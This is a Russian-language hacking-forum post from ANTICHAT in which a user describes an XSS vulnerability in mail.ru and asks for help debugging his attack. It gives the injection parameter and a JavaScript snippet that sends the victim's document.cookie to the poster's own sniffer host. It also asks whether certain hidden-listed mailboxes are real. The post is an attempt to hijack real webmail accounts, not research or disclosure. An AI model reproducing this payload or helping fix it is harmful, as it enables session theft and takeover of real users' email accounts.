HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 18.01.2010, 01:00
PacMan
Новичок
Регистрация: 18.12.2009
Сообщений: 25
С нами: 8630966

Репутация: 1
По умолчанию

1. У меня есть уязвимость xss mail.ru, ?inf=">alert('OK')
2. В index.html вот ...?inf=">
3. В xss.js вот img = new Image(); img.src = "http://мой сайт/jpg/s.jpg?"+document.cookie;
Сниффер свой.

Проблема вот с чем, посылаю письмо, переходит на уязвимую страницу и все, cookies нет.
Проблема думаю в 3., только незнаю как исправить.
Кто может, помогите.

Еще вот:

Скрытый текст (вы должны быть авторизованы и иметь 15 сообщений):


У вас нет прав чтобы видеть скрытый текст, который находится здесь



Это настоящие почтовые ящики ... или нет?
 
Ответить с цитированием
 



Предыдущая тема Следующая тема

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.